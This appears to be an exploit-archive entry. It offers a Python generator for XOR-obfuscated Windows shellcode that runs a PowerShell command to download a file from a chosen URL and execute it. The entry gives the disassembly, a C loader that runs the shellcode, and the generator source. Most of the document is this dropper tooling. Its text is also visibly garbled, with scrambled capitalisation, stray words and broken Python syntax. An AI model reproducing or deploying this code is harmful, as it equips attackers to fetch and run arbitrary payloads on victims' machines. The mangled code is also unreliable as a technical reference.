#Title: obfuscated shellcode, Windows x86/x64 download and execute [uses PowerShell] - generator
#length: dynamic, depends on URL and filename
#date: 20 January 2015
#author: ali razmjoo
#tested on: windows 7 x64 ultimate
#winexec = 0x77b1e695
#exitprocess = 0x77ae2acf
#====================================
#Execute:
#powershell -command "& {(New-object net.webclient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')}; D:\ali.exe"
#====================================
#Ali Razmjoo, [' [email protected] ', ' [email protected] ']
#Thanks to my friends, Dariush Nasirpour and Ehsan Nezami
####################################################
#How does it work?
"
C:\users\ali\desktop>python "Windows x86 Download and execute.py"
Enter url
example: http://z3r0d4y.com/File.exe
enter: http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe
Enter filename
example: d:\File.exe
enter: c:\ali.exe

c:\users\ali\desktop>nasm -f elf Shellcode.asm -o Shellcode.o

c:\users\ali\desktop>objdump -d shellcode.o

shellcode.o:     file format elf32-i386

Disassembly of section .
text:0 0000000 <.text>: 0:31 C0 xor%eax,%eax 2:50 push%eax 3:6 8 $0x22654141 push 8:58 pop%eax 9:c1 E8 shr $0x8,%eax c:c1 E8 shr $0x8,%eax f:50 push%eax 10:b8 0b 4 D mov $0x4d0b4734,%eax 15:BB 5d 6e/mov $0x356e695d,%ebx 1a:31 d8 x or%ebx,%eax 1c:50 push%eax 1d:b8-ten mov $0x22103243,%eax 22:b b 6e 4e mov $0x4e516e79,%ebx 27:31 D8 xor%ebx,%eax 29:50 Push%eax 2a:b8, MOV $0x32420560,%eax 2f:bb, the Mov $0x71797849,% EBX 34:31 D8 XOR%ebx,%eax 36:50 push%eax 37:B8 0f 1c 2c MOV $0x142c1c0f,% EAX 3C:BB 6a $0X3349646A,%EBX mov 41:31 D8 xor%ebx,%eax 43:50 Push%eax 44:b8 3e 0b mov $0x400b3e07,%eax 49:BB $6e mov $ 0X6E625246,%EBX 4e:31 D8 xor%ebx,%eax 50:50 push%eax 51:b8 0a $0X7780A44,%EAX mov 56:bb 5b mov $0x5b424963,%ebx 5b:31 d8 XOR%ebx,%eax 5d:50 push%eax 5e:b8 0f 4b 0d mov $0xd4b160f,%eax 63: BB 6a 2d mov $0x2d67316a,%ebx 68:31 D8 xor%ebx,%eax 6a:50 Push%eax 6b:b8 5c 1f mov $0x1f5c6218,%eax 70:BB, 4c, all in MOV $0x67394c6 1,%EBX 75:31 D8 XOR%ebx,%eax 77:50 push%eax 78:B8 1b 2d 1e 1f mov $0x1f1e2d1 B,%EAX 7D:BB 6b 6a 6b mov $0x6b6a586b,%ebx 82:31 D8 xor%ebx,%eax 84:50 Push%eax 85:B8 mov $0x66414045,%eax 8A:BB 3d $0X4977783D,%EBX 8f:31 D8 xor%ebx,%eax 91:50 push%eax 92:b8 02 1f 4b mov $0x454b1f02,%eax 97:BB 6d 6b 6a mov $0x6a386b6d,%ebx 9c:31 d8 XOR%ebx,%eax 9e:50 push%eax 9f:b8 3e mov $0x32193e24,%eax A4:BB 4e 6a 5a mov $0x5a6a4e45,%ebx a9:31 D8 xor%ebx,%eax ab:50 Push%EAX AC:B8 5e 3a/MOV $0x353a5e00,%eax B1:BB 6c $5b mov $0x5b 49736C,%EBX b6:31 D8 XOR%ebx,%eax b8:50 push%eax b9:b8 1f Notoginseng mov $0x24 40371f,%eax be:bb 6d $0X4132526D,%EBX mov c3:31 D8 xor%ebx,%eax c5: %eax c6:b8 2e $0x3168352e,%eax CB:BB 5a 4c 45 41 mov $0x41454c5a,%ebx d0:31 D8 xor%ebx,%eax d2:50 push%eax D3: B8 1e 1c, MOV $0x151c1e48,%eax D8:BB, 6e, $0X61696E67,%EBX mov dd:31 d8 XOR%ebx,%eax df:50 push%eax e0:b8 0d 5d mov $0x5d0d2826, %eax e5:bb 4f $0X3362454F,%EBX mov ea:31 D8 xor%ebx,%eax ec:50 Push%eax ed:b8 1d mov $0x451d5720,%eax F2:BB $0X36637847,%EBX F7:D8 xor%ebx,%eax f9:50 push%eax FA:B8 
6a 3b MOV $0x3b246a04,%eax FF:BB 4b $0x494b4477,%ebx 104:31 D8 xor%ebx,%eax 10 6:50 push%eax 107:b8 0f 0a mov $0x320a0f18,%eax 10C:BB 6c 6e 78 47 mov $0x47786e6c,%ebx 111:31 D8 xor%ebx,%eax 113:50 push%eax 11 4:B8 7d 3c $0x273c187d,%eax mov 119:bb, 6c 5d, mov $0x555d6c52,%ebx 11e:31 d8 XOR%ebx,%eax 120:50 push%eax 121:b8, MOV $0x6060 4403,%EAX 126:BB 5a 4f mov $0x4f5a3477,%ebx 12b:31 D8 xor%ebx,%eax 12d:50 Push%eax 12E:B8 6b 1f mov $0x201f6b47,%eax 133:BB 6f 4c + mo V $0X54774C6F,%EBX 138:31 D8 xor%ebx,%eax 13a:50 push%eax 13B:B8 2a 5e 2b mo V $0x202b5e2a,%eax 140:bb 6c PNS mov $0x4547376c,%ebx 145:31 D8 xor%ebx,%e Ax 147:50 push%eax 148:b8 0e mov $0xe120759,%eax 14D:BB 6a mov $0x6a736835,%ebx 152:31 D8 xor%ebx,%eax 154:50 push%ea X 155:B8 2c mov $0x2c115901,%eax 15A:BB mov $0x42663645,%ebx 15f:31 D8 xor%ebx,%eax 161:50 push%eax 162:b8 4e 5a mov $0x 5a4e2222,%eax 167:BB 4c $0x7467564c,%ebx 16c:31 D8 xor%ebx,%eax 16e: %EAX 16f:b8 1b, MOV $0x481b3700,%eax 174:BB 5b 2d MOV $0x2d725b43,%ebX 179:31 D8 xor%ebx,%eax 17b:50 push%eax 17C:B8 4a 1f 22 13 mov $0x13221f4a,%eax 181:BB (mov) $0x71474864,%ebx 186:31 D8 xor%eb X,%eax 188:50 push%eax 189:B8 6a mov $0x1803236a,%eax 18E:BB 4a 6d 6 6 6c mov $0x6c666d4a,%ebx 193:31 D8 xor%ebx,%eax 195:50 push %eax 196:B8 2d 1c mov $0x1c57542d,%eax 19B:BB $0X68343147,%EBX 1a0: D8 xor%ebx,%eax 1a2:50 push%eax 1a3:b8 4e 5a mov $0x5a36154e,%eax 1a8:bb $0x38793839,%ebx 1ad:31 D8 xor%ebx,%eax 1AF:50 Push%eax 1b0:b8 7f 1f mov $0x41f7f59,%eax 1B5:BB 79 57 51 61 MOV $0x61515779,%ebx 1ba:31 D8 xor%ebx,%eax 1bc:50 push%eax 1bd:b8 1d 2f mov $0x2f1d5647,%eax 1c2:bb 3d $0X543D7065,%EBX mov 1c7:31 D8 xor %ebx,%eax 1c9:50 push%eax 1ca:b8 2c mov $0x5408182c,%eax 1CF:BB 4d 6c mov $0x746c764d,%ebx 1d4:31 d8 xor%ebx,%eax 1d6:50 p Ush%EAX 1D7:B8 5a 1b mov $0x1b58345a,%eax 1DC:BB 1 5b (mov $0x76355b39,%ebx) e1:31 D8 xor%ebx,%eax 1e3:50 push%eax 1e4:b8 3f 0f 4b m OV $0x414b0f3f,%eax 1E9:BB 6b 6c mov $0x6c6b6353,%ebx 1ee:31 D8 xor%ebx,% EAX 1f0:50 push%eax 
1F1:B8 4a 1e 0b mov $0xb591e4a,%eax 1f6:bb (6d) 6e MOV $0x6e316D38,%EBX 1fb:31 D8 xor%ebx,%eax 1fd:50 push%eax 1FE:B8 2b 2a mov $0x2a162b49,%eax 203:bb-4f mov $0x4f614439,%ebx 208:31 d8 xo R%ebx,%eax 20a:50 push%eax 20b:89 E0 mov%esp,%eax 20D:BB 41 41 $0x1414141,%ebx mov 212:c1 eb $0x8,%ebx shr 215:c1 eb $0X8,%EBX 218:c1 eb, shr $0x8,%ebx 21b:53 push%ebx 21c:50 Push%eax 21D:BB e6 B1 The $0X77B1E695,%EBX 222:ff D3 call *%EBX 224:BB CF 2a AE $0X77AE2ACF,%EBX mov 229:ff d3 call *%ebxc:\users\ali\desktop> ; #you have your shellcode now=======================================shellcode.c#include <stdio.h> #include < String.h>int Main () {UnsigneD Char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d \x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\ X79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\ X6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\ X31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\ Xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\ X50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\ Xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\ X48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\ x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\ x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\ X31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\ 
Xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\ X50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\ Xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\ X2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\ X7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\ X08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\ X41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\ X50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\ Xcf\x2a\xae\x77\xff\xd3 "; fprintf (stdout," Length:%d\n\n ", strlen (Shellcode)); (* (Void (*) ()) shellcode) ();} =======================================C:\USERS\ALI\DESKTOP>GCC Shellcode.c-o shellcode.exeC:\Users\Ali\ Desktop>shellcode.exelength:173c:\users\ali\desktop> #notice: When program exit, you must wait 2-3 second, it'll Finish download and execute file after 2-3 second ' import random,binasciichars = ' Abcdefghijklmnopqrstuvwxyzabcdefghijk lmnopqrstuvwxyz123456789=[]-' P1 = ' xor eax,eaxpush eax ' ' p2 = ' mov eax,espmov ebx,0x01414141shr ebx,0x08shr ebx,0x08 SHR ebx,0x08push ebxpush Eaxmov ebx,0x77b1e695call ebxmov ebx,0x77ae2acfcall ebx "' sen1 = str (raw_input (' Enter url\ Nexample:http://z3r0d4y.com/file.exe \nenter: ')) Sen1 = Sen1.rsplit () Sen1 = Sen1[0]sen2 = str (raw_input (' Enter filename\nexample:d:\\file.exe\nenter: ')) Sen2 = Sen2.rsplit () sen2 = Sen2[0]sen = ' PowerShell -command "& {(New-object net.webclient). 
DownloadFile ('%s ', '%s ')};%s ""% (sen1,sen2,sen2) m = 0for word in Sen:m + = 1m = M-1stack = ' while (m>=0): Stack + = Sen[m] M-= 1stack = Stack.encode (' hex ') skip = 1if len (stack)% 8 = = 0:skip = 0if Skip is 1: stack = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0 if Skip is 1:sta ck = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0 If Skip is 1: stack = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0if len (stack)% 8 = = 0: Zxzxzxz = 0m = Len (stack)/8c = 0n = 0z = 8SHF = open (' Shellcode.asm ', ' W ') Shf.write (p1) shf.close () SHF = open (' Shellcod E.asm ', ' a ') while (c<m): v = ' push 0x ' + stack[n:z] Skip = 0 if ' 0x000000 ' in V: Skip = 1 q1 = v[13:] v = ' push 0x ' + q1 + ' 414141 ' + ' \ n ' + ' pop eax\nshr ea X,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n ' if ' 0x0000 ' in v:skip = 1 q1 = v[11: ] v = ' push 0x ' + q1 + ' 4141 ' + ' \ n ' + ' pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n ' if ' 0x00 ' I n V:skip = 1 q1 = v[9:] v = ' push 0x ' + q1 + ' + ' + ' \ n ' + ' pop eax\nshr eax , 0x08\npush eax\n ' If Skip is 1:shf.write (v) if skip is 0:v = V.rsplit () zzz = ' for W in V:if ' 0x ' in w:zzz = STR (w) S1 = Binascii.b2a_hex (". Join (Random.choice (chars) for I in range (4))) S1 = ' 0x%s '%% data = "%x"% (int (zzz, +) ^ int (s1, +)) v = ' mov Eax,0x%s\nmov ebx,%s\nxor eax,ebx\npus H eax\n '% (DATA,S1) Shf.write (v) n + = 8 z + 8 c + = 1shf.write (p2) shf.close ()